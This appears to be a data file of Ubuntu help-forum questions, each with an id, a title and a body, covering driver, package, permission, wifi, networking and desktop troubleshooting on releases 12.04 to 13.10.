436787	how to see the contents of a file with blank filename ?	drwxrwxr-x 2 ubuntu ubuntu 4096 mar 19 07:30 xxxxx -rw-rw-r -- 1 ubuntu ubuntu 580 mar 20 07:24 -rw-rw-r -- 1 ubuntu ubuntu 27137 mar 20 09:10 xxx.js here there is a file on the second line but its blank , any idea how to see the contents ?
436788	deluge 1.3.6 with ubuntu 13.10 socks5 proxy help	i have deluge 1.3.6 running on ubuntu 13.10 trying to use with torguard socks5 proxy and it does n't work , i hear there is a bug in libtorrent0.16 but what can i do to get this to work ?
436789	disable touchpad on arm samsung series 3 chromebook chrubuntu 12.04	is there a way to disable the trackpad of an arm device when it suspends ? my current problem is that when my samsung series 3 is suspended , the trackpad is super sensitive and will wake the device too easily ( even the proximity of the screen when the lid is closed seems to be enough to wake it ) . i have tried using synclient and xinput to disable it but it turns back on when its suspended . i had seen suggestions for other devices to use /proc/acpi/wakeup but as this is an arm device it does n't have acpi . does anyone have any suggestions ? thanks .
436791	eog does not recognize .png file format and many icons are gone	i use ubuntu 12.04 and xfce desktop on a pc with nvidia graphics card . i ran into segmentation fault during a ubuntu update process . an very inconvenient consequence is that .png files can not be recognized any more thus many programs can not be started ( e.g . gnome-commander , stardict ) . also many icons are missing , as well as the min/max/close button icons . i tried open .png using eog and got `` unrecognized image file format '' . i tried reinstall libgdk-pixbuf2.0-0 and librsvg and always got segmentation fault . ... setting up libgdk-pixbuf2.0-0 ( 2.26.1-1 ) ... segmentation fault ( core dumped ) setting up libgdk-pixbuf2.0-0 : i386 ( 2.26.1-1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place running gdk-pixbuf-query-loaders brings up segfaults as well ( but not gdk-pixbuf-pixdata or gdk-pixbuf-csource ) : > gdk-pixbuf-query-loaders -- update-cache segmentation fault ( core dumped ) i tried logging into gnome and saw the same effect . i tried downloading libgdk-pixbuf2.0-0 package file .deb and installing from command line and got segfaults , too . any suggestions on how to fix it ? update : i carefully checked all the dependencies ' versions in the precise-update database and none of them have problems .
436793	how do i lock screen on live ubuntu ?	i 'm running live ubuntu 12.04 . i do n't see the 'lock screen ' button under the top right gear button . the shortcut ctrl + alt + l does n't work either .
436794	adding subdomain	could you please help me . i am using apache2 under ubuntu 12.4 and i want to have subdomain like exam.domain.com . for this i have edit all the config files include hosts and enabled my sub site named exam.localhost and add this line in config file . < virtualhost *:80 > documentroot /var/www/site/www/exam servername project.localhost < directory /var/www/site/www/exam > allowoverride all order allow , deny allow from all require all granted < /directory > < /virtualhost > ` when i type exam.localhost in browser it works but when i type like exam.domainname.com it 's not working . thank you for an help
436796	ubuntu 13.10 how to change nautilus title bar color	i would like to know if i need to change the file nautilus.css in gtk3 theme folder or metacity.xml in metacity theme folder i use ubuntu 13.10 in flashback mode thank you
436799	supporting ricoh aficio sp 100 printer	i have a new printer ricoh aficio_sp 100 su . how to install it with ubuntu ? i have got no software cd .
436802	why do i get 'error while loading shared libraries : libgl.so.1 : wrong elf class : elfclass64 ' when i run mercury ?	using native opengl /home/software/mercury_3.3/c_linux/bin/mercury.x : error while loading shared libraries : libgl.so.1 : wrong elf class : elfclass64
436805	failed to create thumbnail error fills gnome-session.log.1 to 50 gb !	yesterday i got a message that my /home partition was full so i moved a 10 gb folder to a external hdd . now i got the message again so i did the disc usage analyzer , and i found a 50 gb file in /home/.cache/upstart named gnome-session.log.1 . i i could not read the file so i deleted the file now and it immediately starts filling up with this message ( nautilus:2930 ) : gnomedesktop-warning ** : failed to create thumbnail /home/wouter/.cache/thumbnails/large/13b82fd16426ec5a8f99f1aa286de1f1.png.92b5cx : fatal error in png image file : write error i do n't really get what is going on here , the file 13b82fd16426ec5a8f99f1aa286de1f1.png does exist , but i do n't think i have used it today anywhere . how do i prevent this log from filling up again ?
436806	how to completely remove xubuntu and install ubuntu ( including boot screen etc . )	i had xubuntu 14.04 beta 1 installed . now i have installed ubuntu-desktop package but i see that there are still xubuntu application icons , login screen , theme , boot screen etc . how to completely remove them and configure the default ubuntu things ? will sudo apt-get remove xubuntu-desktop and sudo apt-get autoremove do ?
436811	ubuntu 13.10 which driver should i install ?	i have the nvidia gt 420m and the closes source driver 319.60 . i red that with the drivers 319 . * the nvidia optimus is native . is that true ? what about the open source drivers ? i have not use them for 2-3 years . are the closes source still better ? thanks
436818	redboot command prompt	i have a problem in opening redboot command prompt , after power up i press ( ctrl+c ) from terminal but redboot command prompt ca n't be opened but nothing occurs at all , my board is : ts7260 my host ubuntu version is : 12.04 any help please ? ? ! ! !
436819	graphics issue for lenovo g580	i recently installed ubuntu 13.10 . everything was fine till i ran inxi and found the following - system : host : kaustuv-lenovo-g580 kernel : 3.11.0-18-generic x86_64 ( 64 bit ) desktop : gnome distro : ubuntu 13.10 machine : system : lenovo product : 2189 version : lenovo g580 mobo : lenovo model : invalid version : 31900003win8 std mlt bios : lenovo version : 5ecn92ww ( v8.04 ) date : 09/14/2012 cpu : dual core intel core i3-2328m cpu ( -ht-mcp- ) cache : 3072 kb flags : ( lm nx sse sse2 sse3 sse4_1 sse4_2 ssse3 vmx ) clock speeds : 1 : 800.00 mhz 2 : 800.00 mhz 3 : 800.00 mhz 4 : 800.00 mhz graphics : card-1 : intel 2nd generation core processor family integrated graphics controller card-2 : nvidia gf108m [ geforce gt 635m ] x.org : 1.14.5 drivers : ( unloaded : fbdev , vesa ) failed : nouveau , intel resolution : 1366x768 @ 60.0hz glx renderer : mesa dri intel sandybridge mobile glx version : 3.0 mesa 9.2.1 audio : card : intel 7 series/c210 series family high definition audio controller driver : snd_hda_intel sound : advanced linux sound architecture ver : k3.11.0-18-generic network : card-1 : qualcomm atheros ar8162 fast ethernet driver : alx if : eth0 state : down mac : b8:88 : e3:8b : e5:4d card-2 : broadcom bcm4313 802.11bgn wireless network adapter driver : wl if : eth1 state : up mac : c0:14:3d : cc:35 : e1 drives : hdd total size : 500.1gb ( 75.3 % used ) 1 : id : /dev/sda model : st500lt012 size : 500.1gb partition : id : / size : 25g used : 5.4g ( 23 % ) fs : ext4 id : swap-1 size : 1.07gb used : 0.00gb ( 0 % ) fs : swap raid : no raid devices detected - /proc/mdstat and md_mod kernel raid module present sensors : system temperatures : cpu : 69.0c mobo : n/a gpu : 66.0 fan speeds ( in rpm ) : cpu : n/a info : processes : 227 uptime : 2:05 memory : 1396.3/7849.2mb client : shell ( bash ) inxi : 1.9.12 under the graphics section i found failed : nouveau , intel . i looked around a bit but did not find any solution sepecific to my hardware . can anybody suggest me how i can fix this . thanks in advance
436821	no wireless on ubuntu 12.04 . how to claim network ?	i 've just installed ubuntu 12.04 on my asus s551lb , but the wireless connection is not working when typing sudo lshw -c network i get this message : bastian @ bastian-s551lb : ~ $ sudo lshw -c network [ sudo ] password for bastian : *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : 74 : d0:2b : e6:21 : f0 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a ip=172.16.2.38 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:61 ioport : e000 ( size=256 ) memory : f7904000-f7904fff memory : f7900000-f7903fff *-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 6b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f7800000-f7801fff so it appears that the network is unclaimed , but how do i claim it ?
436823	multihop sshfs from boot	i have a server at uni that i can ssh into from home . from there , i can ssh into my work computer and i have access to a nas i have mounted . i ca n't ssh directly into my work computer . what i would like to do , is mount the nas folder onto my home computer . if this is possible , i 'd like to make it mount every time i boot up the computer . i 've tried a few solutions i 've found on the net , with a few problems . i 'm not sure which port to use for the tunnel , if that 's even necessary . when i finally got something that looked like it worked , i get issues of not being able to cd into the mounted directory because of 'permission denied ' . then when i tried to su it i get an authentication failure . any ideas ? thanks , james
436826	install wine 1.7 on 12.04	i ca n't install wine1.7 on ubuntu 12.04 . $ sudo add-apt-repository ppa : ubuntu-wine/ppa $ sudo apt-get update $ sudo apt-get install wine1.7 winetricks lecture des listes de paquets ... fait construction de l'arbre des dépendances lecture des informations d'état ... fait winetricks est déjà la plus récente version disponible . winetricks passé en « installé manuellement » . certains paquets ne peuvent être installés . ceci peut signifier que vous avez demandé l'impossible , ou bien , si vous utilisez la distribution unstable , que certains paquets n'ont pas encore été créés ou ne sont pas sortis d'incoming . l'information suivante devrait vous aider à résoudre la situation : les paquets suivants contiennent des dépendances non satisfaites : wine1.7 : dépend : wine1.7-amd64 ( = 1:1.7.14-0ubuntu1 ) mais ne sera pas installé dépend : wine1.7-i386 ( = 1:1.7.14-0ubuntu1 ) e : impossible de corriger les problèmes , des paquets défectueux sont en mode « garder en l'état » . and if i try to install the dependences : $ sudo apt-get install wine1.7-amd64 lecture des listes de paquets ... fait construction de l'arbre des dépendances lecture des informations d'état ... fait certains paquets ne peuvent être installés . ceci peut signifier que vous avez demandé l'impossible , ou bien , si vous utilisez la distribution unstable , que certains paquets n'ont pas encore été créés ou ne sont pas sortis d'incoming . l'information suivante devrait vous aider à résoudre la situation : les paquets suivants contiennent des dépendances non satisfaites : wine1.7-amd64 : dépend : wine1.7 : any ( = 1:1.7.14-0ubuntu1 ) e : impossible de corriger les problèmes , des paquets défectueux sont en mode « garder en l'état » . $ sudo apt-get install wine1.7-i386 lecture des listes de paquets ... fait construction de l'arbre des dépendances lecture des informations d'état ... fait certains paquets ne peuvent être installés . ceci peut signifier que vous avez demandé l'impossible , ou bien , si vous utilisez la distribution unstable , que certains paquets n'ont pas encore été créés ou ne sont pas sortis d'incoming . l'information suivante devrait vous aider à résoudre la situation : les paquets suivants contiennent des dépendances non satisfaites : wine1.7-i386 : i386 : dépend : liblcms2-2 : i386 ( > = 2.2+git20110628-2 ) mais ne sera pas installé e : impossible de corriger les problèmes , des paquets défectueux sont en mode « garder en l'état » .
436828	is there an ubuntu version of windows ' 'system refresh ' option ?	windows 8 allows users to reinstall the operating system without removing documents , music , and pictures ( basically , without removing the home folder ) ; is there a similar function available in ubuntu ? windows defines their system refresh option : '' if your pc is n't performing as well as it once did , and you do n't know why , you can refresh your pc without deleting any of your personal files or changing your settings . '' do n't care about losing settings . do care about losing files . is there a way i might be able to move files to a partition , or something workaround-ish like that ?
436829	is there any option to set brightness permanently in ubuntu desktop gui ?	i have changed the brightness level permanently using terminal . temporarily we can change the brightness in gui . but for permanently setting it , is there any option in gui mode ? if not why such a thing is not there ?
436832	not able to install google chrome	i have tried all the answers on this site but it doesnt help nothing works and it gives this following error : unpacking google-chrome-stable : i386 ( from ... /google-chrome-stable_current_i386.deb ) ... dpkg : dependency problems prevent configuration of google-chrome-stable : i386 : google-chrome-stable : i386 depends on xdg-utils ( > = 1.0.2 ) . dpkg : error processing google-chrome-stable : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for man-db ... does someone has ay clue ?
436833	realtek rtl8191s wont enter monitor mode	every thing is explained the screenshots below http : //i.stack.imgur.com/sfqf9.png http : //i.stack.imgur.com/1rson.png i.stack.imgur.com/gwttg.png thats how other wifi looks wlan0 , i have the problem with wlan3 i.stack.imgur.com/maild.png i.stack.imgur.com/sarjb.png
436835	wireless keeps disconnecting intel agb 3945	i 've been having issues with my wireless connection . it seems as if the connection is fine for around 5 minutes , after which my wireless connection drops for no apparent reason . i have disabled power management and created /ect/modprobe.d/iwl3945.conf options iwl3945 disable_hw_scan=0 here for my lspci 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 02 ) 00:1c.5 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 6 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f2 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 02 ) 03:01.0 cardbus bridge : o2 micro , inc. cardbus bridge ( rev 21 ) 03:01.4 firewire ( ieee 1394 ) : o2 micro , inc. firewire ( ieee 1394 ) ( rev 02 ) 09:00.0 ethernet controller : broadcom corporation netxtreme bcm5755m gigabit ethernet pci express ( rev 02 ) 0c:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) thank you for any help
436837	is there any general guideline to follow in order to know why i get a permission denied error while running a particular command ?	i had recently tried to move a file to overwrite /dev/null and had encountered a permission denied error . from using ubuntu for the last couple of years , i know that if i get this error , i need to be sudo to invoke the command and then it would succeed . this is what i did to overwrite /dev/null as well . however , artbristol posted a comment over there saying that blindly invoking sudo to run a command is not a good habit and we should know why we are being denied the permission to run that command before proceeding further . i tend to agree with him along with all the people who have heavily upvoted that comment . but i do n't know how to proceed to know the `` why '' . recently , i came across this answer and tried to run the command as mentioned ( 393222 is the inode of examples.desktop file in ~ ) : $ find . -inum 393222 -exec nano { } \ ; find : `./.gvfs ' : permission denied find : `./.cache/dconf ' : permission denied running the above command did open examples.desktop file in nano , but also gave permission denied for the two folders . following are the attributes of the two folders ( truncated output of ls -la ) : drwx -- -- -- 2 root root 4096 mar 11 21:04 .gvfs drwx -- -- -- 2 root root 4096 mar 11 21:04 dconf is there any general guideline to follow in order to know `` why '' i get a permission denied error while running a particular command ?
436839	battery life in ubuntu 13.10	i have an acer aspire 5742g . my battery life is not good at all . i bought a new battery ( not original ) and my battery life is about 1h and 40 minutes . with the last battery i had ( the original one ) my battery life was about 30 minutes . tlp is installed and i have the closed source nvidia drivers installed . any ideas what can be wrong ? ? ? i have ubuntu 13.10 64bit with unity . those times where while using firefox or chromium , skype ( logged in but not using it ) , dropbox and ubuntu one . p.s . i know that there is a serious chance the problem to be with my battery but i still want to know if there is any other problem and if it is possible to find out what is it .
436841	should ubuntu users be concerned about `` operation windigo '' ?	should desktop users of ubuntu ( and other linux distros ) be concerned about the malware-infection drive described as `` operation windigo '' ? what threat does it pose to us immediately and are there any longer term ramifications ?
436845	choose an application	when i try to install an application from the ubuntu software center or internet , i keep getting a screen called `` launch application '' , which says : '' this link needs to be opened with an application . send to : choose an application . as a newcomer to ubuntu and just a user ( not an it expert ) , i do n't know what to choose . please help . i use ubuntu 12.04 on a dual-boot acer xp laptop .
436846	allowing cookies with google chrome is not working	i am trying to access mlb gameday audio . when trying to click on that site , i keep getting the popup box to set my browser to accept cookies . i used the help feature with google chrome and cookies are allowed . i even created an exception using the formula provided with chrome 's help feature [ * ] mlb.mlb.com it still is n't working . any ideas ? i am encountering the error message when i hit the subscribe button on mlb gameday audio ***i am a rookie ubuntu user , been at it for about 2 months now . thanks for any help ! dan
436851	encrypting text editor	is there an encrypting text editor for ubuntu ? in other words , the text editor , preferably gui capable , should always save an encrypted file and always prompt for the password to re-open the file . the point is to combine the functionality of a text editor with an encryption tool .
436853	ubuntu installer does n't recognize my partitions	i 'm trying to dual boot ubuntu 13.10 along with win8.1 . the problem here is ubuntu installer does not recognize any of my partitions and shows my whole hdd space as unallocated . that is the case with gparted also . the tricky part is that the ubuntu itself ( in live mode ) is perfectly capable of recognizing and mounting the partitions . i did a little searching and came up with this solution but i can not be sure that it applies to my problem too as i can not risk loosing my windows installation . update : the result of mount : /dev/sda2 on /media/ubuntu/585084b850849dfe type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda3 on /media/ubuntu/linux type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda5 on /media/ubuntu/linux home type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda6 on /media/ubuntu/misc type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) update 2 : upong running gparted i get the following message : /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? and here is a screenshot from gparted .
436860	ubuntu does not recognise installed oracle jre & installs openjdk packages	i have oracle jre installed on my system . however while installing tomcat7 with apt-get it does not recognize my installed oracle java ( installed using tar from oracle website ) , but on another system it recognizes the oracle java installed by webup8 ppa , so how do i make my manual oracle java installation be recognized by tomcat ? my main motive is to prevent openjdk & other related installations worth 80mb using oracle jre as replacement for that . here 's some details from current configuration on server : admin @ server01 15:30 ~ # update-alternatives -- config java there is 1 choice for the alternative java ( providing /usr/bin/java ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/jvm/jdk1.7.0_51/bin/java 1 auto mode * 1 /usr/lib/jvm/jdk1.7.0_51/bin/java 1 manual mode
436869	how to change directory to the old directory ?	i am currently in /downloads directory . before i was in /var/www directory . how can i return back to the old directory in terminal ? i do not want to execute cd /var/www i need a simple command to change to old directory .
436874	new apache 's version in repositories	does anyone has a time frame for an update in apache 's version for repositories/official-repositories ? ubuntu server is working like a charm and would n't like to switch to manual installation for apache due to pcidss flags . currently ver 2.2.22 ( 2.2.22-1ubuntu1.4 ) is distributed from repositories and asvs find this to be vulnerable although security patches are applied .
436876	ca n't install hardly anything ... winbind unstable	reading package lists ... done building dependency tree reading state information ... done winbind is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/2,511 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing winbind ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . errors were encountered while processing : winbind e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this is the general idea anytime i try to do anything with winbind .
436879	ubuntu server 12.4 log-in	i have a strangest of the problems . what i have is ubuntu server 12.04 lts on which i installed ubuntu desktop . everything got installed without a glitch . until ... . i wanted to log-in . when i click on the user name , pc pauses for a while , the screen turns black and then jumps back to log-in screen again ... .. but when i create an admin user from webmin , it logs in without a glitch ... . so ... . what should i be doing ?
436882	cciss not recognizing new scsi drives - hp proliant server	linux newbie here . i have a hp proliant server , which i can get details on if they will help . this blade has been running windows server 2008 up until last week , when i loaded ubuntu 12.04 server to implement a fog server for imaging . i started with a 148gb scsi drive and installed ubuntu , got the fog working wonderfully . i decided today that i needed more space for images . there are three 72gb scsi drives sitting in the server ( unseated ) and i want to do a raid 5 with them . i pushed all three of the drives in , did several restarts , but still fdisk -l and parted -l do not see them . /dev/cciss/c0d0 exists , but c0d1 and so forth do not . am i missing something here ? the drives worked fine a week ago in a windows environment . thanks so much for any help you can provide . edit : to help , here is the readout of fdisk -l : root @ s-9782 : ~ # fdisk -l disk /dev/cciss/c0d0 : 146.8 gb , 146778685440 bytes 255 heads , 32 sectors/track , 35132 cylinders , total 286677120 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002fd38 device boot start end blocks id system /dev/cciss/c0d0p1 * 2048 499711 248832 83 linux /dev/cciss/c0d0p2 501758 286676991 143087617 5 extended /dev/cciss/c0d0p5 501760 286676991 143087616 8e linux lvm disk /dev/mapper/s -- 9782 -- vg-root : 137.9 gb , 137912909824 bytes 255 heads , 63 sectors/track , 16766 cylinders , total 269361152 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/s -- 9782 -- vg-root does n't contain a valid partition table disk /dev/mapper/s -- 9782 -- vg-swap_1 : 8585 mb , 8585740288 bytes 255 heads , 63 sectors/track , 1043 cylinders , total 16769024 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/s -- 9782 -- vg-swap_1 does n't contain a valid partition table
436884	how to set a default window manager	ubuntu 12.04 lts uses compiz 0.9.7.12 as a default window manager . where ubuntu stores an information which window manager is used by default ? i want to permanently switch to the metacity or run compiz with parameters , for example compiz -- debug core composite opengl .
436886	still problem with wifi in saucy xubuntu	my laptop has a broadcom chip and yes , i 've followed the related posts on this site like this one but i still have a problem . not all features of the card work with a given configuration . by `` configuration '' i mean one of the following . in the `` additional drivers '' , there are two choices , one `` bcmwl-kernel-source '' and the other `` do not use device '' . with the first one i can connect to routers without a problem but `` laptop hotspot '' does not work ( of course i do n't mean 'at the same time ' ) . with the second one , i can use my laptop as a hotspot ( at home ) , but when i 'm at work or elsewhere , nm-applet does not show the available networks . ( in this situation i can turn the card off and on manually then choose `` connect to hidden network '' . ) and no , it 's not blacklisted ; and `` bcmwl-kernel-source '' is not installed . below is the output of some relevant commands ( with the second configuration ) : lspci 08:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) subsystem : dell device [ 1028:02bb ] kernel driver in use : r8169 0e:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card [ 1028:000c ] kernel driver in use : b43-pci-bridge iwconfig mon.wlan0 ieee 802.11bg mode : monitor tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : on wlan0 ieee 802.11bg essid : '' something '' mode : managed frequency:2.437 ghz access point : bit rate=48 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=65/70 signal level=-45 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:504 invalid misc:4176 missed beacon:0 lsmod | grep -e wl -e b43 b43 387322 0 bcma 46699 1 b43 mac80211 597268 1 b43 cfg80211 480503 2 b43 , mac80211 ssb 62057 1 b43
436887	deluge keeps crashing	i 'm using ubuntu 12.04 for almost a week now and tried deluge 1.3.6 ( through the ppa their website provided ) , but it keeps crashing . i do n't really know why it does though . i had searched the internet for more information on it , but could n't find the reason nor a solution . i tried deluge 1.3.5 without the ppa , which crashed also . i noticed that the versions of libtorrent differ when asking deluge or the package manager . user @ pc : ~ $ deluge -v deluge : 1.3.6 libtorrent : 0.15.10.0 while it says 0.15.10-1 in the package manager after libtorrent-rasterbar6 . not sure if this is related to the problem though . since the crash report is quite large , i did n't really know what information to provide , but i read deluge was supposedly be a good torrent client for ubuntu , so what do you think the problem is and what can i do to fix this ? @ rinzwind : the warning is when starting deluge , the segmentation fault is when it crashes . /usr/lib/python2.7/dist-packages/deluge/ui/gtkui/mainwindow.py:108 : warning : g_object_unref : assertion `g_is_object ( object ) ' failed gtk.main_iteration ( false ) segmentation fault ( core dumped ) update after updating to 0.16.14.0 as mentioned in cas 's answer , the warning remains , though it has n't crashed yet . i 'll update if it crashes again .
436888	removed /boot files resulted in `` file not found . you need to load the kernel first '' error	i mistakenly deleted some files from \boot as system waz showing low disk space . i am using ubuntu 12.04 . now when i restarted the laptop , it shows `` file not found.you need to load the kernel first '' help ! !
436890	can not mount encrypted luks drive with `` x-gvfs-show '' option	i 've used linux mint 16 petra 's disks utility to format my external drive as an encrypted luks ext4 partition . the problem is that i ca n't mount it if i use the option `` show in user interface '' , that adds a `` x-gvfs-show '' parameter to my fstab file . if i remove this parameter i can mount it correctly but i do n't see the drive in nemo . the output of `` dmesg | tail '' just after i try to mount the drive is : [ 724.841456 ] ext4-fs ( dm-3 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 2094.754682 ] ext4-fs ( dm-3 ) : unrecognized mount option `` x-gvfs-show '' or missing value [ 2114.994445 ] ext4-fs ( dm-3 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 6286.799200 ] ext4-fs ( dm-3 ) : unrecognized mount option `` x-gvfs-show '' or missing value a workaround that i 've found is to disable that option , mount the drive , then add it back and the drive will be showed into nemo 's sidebar , but i 'd prefer to avoid this boring steps every time i boot up . thanks !
436891	create a .desktop file that opens and execute a command in a terminal	i would like to know how to write the exec command of a .desktop file to open a new terminal and execute a shell script in it . the shell script is working and accessible by all users . when launching the script from the terminal everything works , but it does n't when trying to launch the script from a .desktop file . here are some combinations i have already tried : exec=gnome-terminal -x sh -c 'echo hello' exec=sh -c 'gnome-terminal echo hello' exec=sh -c 'echo hello' exec=echo hello the .desktop terminal option is set to true .
436892	photo viewer / file manager thumbnails / photos	i started working @ a recovery data company and sometimes i have to manualy go through all the photo 's and delete the ones that are not 100 % correct . something the thumbnail shows no problem with the picture , but when i open it , it 's totally messed up . and it would safe me a lot of time if there 's a program or a file manager kind of thing that shows the photo in a small size instead of showing the thumbnail , since thumbail is n't the same as a small picture . hope you all understand and someone has a good solution . thanks < 3
436899	default group permissions for /var folder	i accidentally ran sudo chmod -r g+rw /var instead of sudo chmod -r g+rw /var/www . this means that for every file , the group owner now has explicit read-write access . i have already seen an example of attempting to fix chown -r www-data : www-data /var but that is a slightly more serious issue that does n't really apply here . also the help given does n't really help me restore the group permission settings to /var . is there an easy way to set the group permissions back to their defaults ? what would you advise i do now ? i 'd really like to avoid reinstalling if possible . // edit : i reinstalled ubuntu . thanks for your help .
436904	how do you create a script to batch add repositories and then batch install packages ?	i 've used synaptic package manager to save markings for all installed packages to a file . here 's a snippet : libmono-system-drawing-design4.0-cil install spotify-client install mono-2.0-service install xtrans-dev install inputattach install ibus-gtk install libappindicator3-1 install spotify-client , though , is not part of the default spm set of repos . and the script that spm generated for me does n't appear to add external sources . so , how i do i create a script that add external sources , updates the package lists , simulates the installation , and then does an actual batch install ? i assume the programs i 've installed through the ubuntu software center are reflected in synaptic package manager -- usc is a frontend for a frontend , no ?
436906	is it possible to add things such as internet searches to the default unity search ?	if i wanted to search the internet from the unity search utility , is it possible to add that ? would it be possible to add something to it that shows only internet shopping results ?
436908	how can i check for apt-get errors in a bash script ?	i am writing a bash script to install software and update ubuntu 12.04 . i would like the script to be able to check for apt-get errors especially during apt-get update so that i can include corrective commands or exit the script with a message . how can i have my bash script check for these types of errors ? edit march 21st : thank you terdon for the providing just the information i needed ! here is the script i created with a combination of your suggestions to check for updates and recheck when errors occur and then report back . i will be adding this to a longer script that i am using to customize new ubuntu installations . # ! /bin/bash apt-get update if [ $ ? ! = 0 ] ; then echo `` that update did n't work out so well . trying some fancy stuff ... '' sleep 3 rm -rf /var/lib/apt/lists/* -vf apt-get update -f || echo `` the errors have overwhelmed us , bro . '' & & exit fi echo `` you are all updated now , bro ! ''
436910	what is the significance of permission of `/etc` ?	trying to replicate the problem described in `` /etc/profile permission denied ! '' where op of the post in her comments mentions the permission string for her /etc directory being drw-r -- r -- . i issued sudo chmod 644 /etc and yes that did replicate the problem . then in live environment i corrected the permission back to 755 . ( i thought thought that would do no harm , i was just changing the permissions ! ) with /etc permission reverted back to original , the login problems and others like not being able to sudo were fixed but i 'm facing lots of problems in the gui . unity does n't load , no launcher , no dash appears ! helped to some extent but other problems still persist . the question : what 's the reason behind this ? i just toggled the execute bit of /etc 's permission ! why did that have significant effect on unity ?
436912	installation fails on compaq m700 laptop	i 'm trying to install ubuntu on a very old compaq laptop which was running win xp ( very slowly ! ) . the installation seems to fail due a graphic driver issues . i accept the option to use a generic driver , it then tries to restart the display . at that point , the screen goes blank and the installation seems to stop . any advice gratefully received ! many thanks
436914	pidgin plugins/features on a per-account basis ?	i use pidgin to login with multiple accounts at the same time . can i turn on and configure plugins on a per-account basis ? for example , i want `` message notifications '' when a buddy of '' carter.barry '' on google talk logs in , but not when a buddy of '' barry.carter.121 '' on facebook logs in .
